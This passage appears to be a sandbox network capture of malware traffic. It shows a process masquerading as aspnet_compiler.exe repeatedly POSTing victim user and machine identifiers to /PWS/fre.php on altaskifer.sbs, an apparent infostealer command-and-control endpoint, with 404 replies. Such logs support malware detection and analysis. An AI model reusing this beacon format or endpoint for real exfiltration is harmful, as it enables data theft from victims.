Apr 6, 2024 09:31:07.123332977 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:07.492587090 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FGhWerHES4N4pF5rhJ7F4AxwPyT5JT6qtAB%2BJKSpR8vSx8xEOtrbZ%2B8ozCy87hgbX4VWo%2Bz8S%2FPyH8dmVqQCv22oU%2BIiNLjGCoi82hveMPhQKE8%2FZ3GDuoa0QJdVDbG2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013912d06dab1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.6	49851	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:07.768548965 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:07.892378092 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:08.281070948 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d6XDMawKld1tn5YSGrAigjhZWleh5uvTxkq8a3Hmys7ZzA0EChV9a6%2Fg5G3THPBmEzmv6Plb1jZXA2lIZZQVPAXISr9G0eoTPwlacfZ5a3v8jLg2SkQhS9W4Rs1hAXldrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87001395fb283347-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.6	49852	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:08.547894955 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:08.671363115 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:09.051033020 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0p44MuOINGEL1NFOgx0i27x%2FYRAx5kNDDkPweOKYfZLJOETodlL3yGNQVD3QOEUGqGusHfGc0R0GcSy3oBgEAwJtbLBJhXqYbNNmJGDCR%2BOncA2C5HgI1muUmS8jpotCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700139addd0da53-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.6	49853	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:09.316932917 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:09.441440105 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:09.810904026 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pu3Ghg%2BD1Ht%2FX8NSoxrraD3BGqFl9hl6W87u7SgNiU2UkgzJkEDZVsRMFu7LO2F7KIxTzw%2F3%2B0eK90K4ECGNqQC%2Bb5hOVmdYxCTbmZJRVAU2BEir4Pl3wjqBrtoN8%2B%2BrBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8700139faecfda4f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.6	49855	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:10.080333948 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:10.204709053 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:10.572736979 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLeAwqloMsUbKvxI3EKaV88FdN7mAsFsxHs6Zaav1rIVuFtSfGo9M5eWWAhuy%2B9L1u2rTkaE86sDlaCRUQqtu7b7fOoqfHXRbDwIeAYKULnF7ECqexB7RRB5yVfglBLSWw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013a46ffd8dd6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.6	49856	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:10.846749067 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:10.970324039 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:11.336899042 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrW8bXs0ZBUSnq1fkFmgXpaakc8r8y4A25I2UTmwC3GyyTlqR5pBomCpcm4NHr3XDN7ZkI1AnYjrL6Yr1QE5esT1KP09A9ltjzmHVmnQEaA7PHmkVBRHS6AZ%2FaQYGcEsKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013a92c184988-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.6	49857	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:11.610579014 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:11.734463930 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:12.097577095 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9RaApPfE6upeyNuSRf6XD%2FH5saBd60MqGlChSRqyE5QZ5N42dz2ZL84pOTOO4hX%2BHxw53fnqRZJf3vDxTKBeJTd%2FvQxVfYNk9hQwojBY%2FnqzAqshfubzxRFdhfsuXq6AA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013adfc826db6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.6	49858	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:12.357167959 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:12.481923103 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:12.864523888 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2HZE5EwbHDpGHOsELggaPbqHTnAwPc82HKJ3dwDsE0cBcPpXZBDGChTThoUJMI28Rq5R4mA65wFnl01RvjZ25JBoVjw1McHIM7RTia%2B4NuijPZXTTNAtOEard7FLQEegBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013b2a8b9a575-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.6	49859	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:13.117985964 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:13.242110014 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:13.639862061 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=InVjmQySneVwFIvcB%2BMKAzADbiRL3UqbqlRAOLUArt2Lk8vxhBbfocB5x7251NqQkPEPfxnfrYb3YJBM332ZxGXtbZqEPJcDKCdLFrCcHIJ2zdVD9yrTXmIDOQK34dAFRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013b76e134c15-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.6	49860	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:13.897342920 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:14.021501064 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:14.411401987 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydm07zyz%2F9SecHwthypbxWJzD0NhDi%2BhqV6Y3y7guYLov0RPixGzpTOblWWuRmaMehytK14Bce45jceALt%2BMxFH086EZ2tFXgCWU0vBp2e%2BcdJ07w6tlORxWKwKlWwnfgA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013bc4f1d8da6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.6	49861	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:14.663983107 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:14.788913965 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:15.172118902 CEST	609	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=js%2B3kSubVzQoLrNf9jMl6m9d5%2Bl9qUpPK9HAauQK%2FCp5wi%2FnFU7Zx4DWyDaNLXBsLevZOP6cClqiIp7HSfHVfrqRKGBmYA%2Fy3raJhMSQzz63MyBYNLpVlrgYy%2Fy4%2Fq4zww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013c10ee102ed-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.6	49862	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:15.463120937 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:15.586615086 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:15.951977015 CEST	599	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BoQ8mn4yQZ8xuvVJPVHXrgjiI1Kc5z1yQX4TsUmShe4umxdCggYnVCjNAOUj3CfC4XZdUFyW4CdQf3HGHF8iQUGsec3pfNnoT9HUl0qO7tEqiaG%2FmOHFY5KfAP6lxOwSuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013c60f5e31da-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.6	49863	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:17.815577030 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:17.939762115 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:18.328830004 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RepKrIlom55Ury5ShmjaPgwc58l61fbVjowvj48GpQ0JyfEJweHEqfmZHpLJNqg4hHfJBRupuGSi%2B1r719dD%2BM760fasd1M3Qa7axmSkv97RLz0JKSUP3m1qI%2BXliKFOZg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013d4bb227477-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.6	49864	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:18.590588093 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:18.716793060 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:19.106915951 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kiVr%2Bmu6p3qg8iYD06JAPTm6K81vYRbCMTOf8NZ8CDWzUuYmxAChkrNBs8jn3qgiLqmVPGXg1B93YtQTZe%2BBMaplO4Ilhn555zJWpLHaU1aJJ%2BwzeR%2F4G9dKD7nIeEFbGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013d99e615c5f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.6	49865	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:19.370644093 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:31:19.495301008 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:31:19.871881962 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:31:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fu9%2Fz0txcHfLZrS8TZNpgqQFUX%2BD%2BTaFhYWoraQEtTvcH7zfHONy1R83EEyR0Ifle%2FkhIYqo1OpefJDlReRvjGupOq3E0jJrF0k9QMKb7x%2BACvO1pea45423D9R2HgrdLA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870013de7c9bb3d4-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.6	49866	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:31:20.136719942 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
